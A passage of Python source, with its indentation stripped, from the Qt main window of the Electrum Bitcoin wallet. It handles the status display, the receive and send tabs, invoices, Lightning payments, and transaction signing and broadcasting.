fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
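        # "Max" button handler: build an unsigned transaction spending all
        # selected coins, then fill the amount field with its output value minus
        # any extra fee reported by plugins via the 'get_tx_extra_fee' hook.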
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
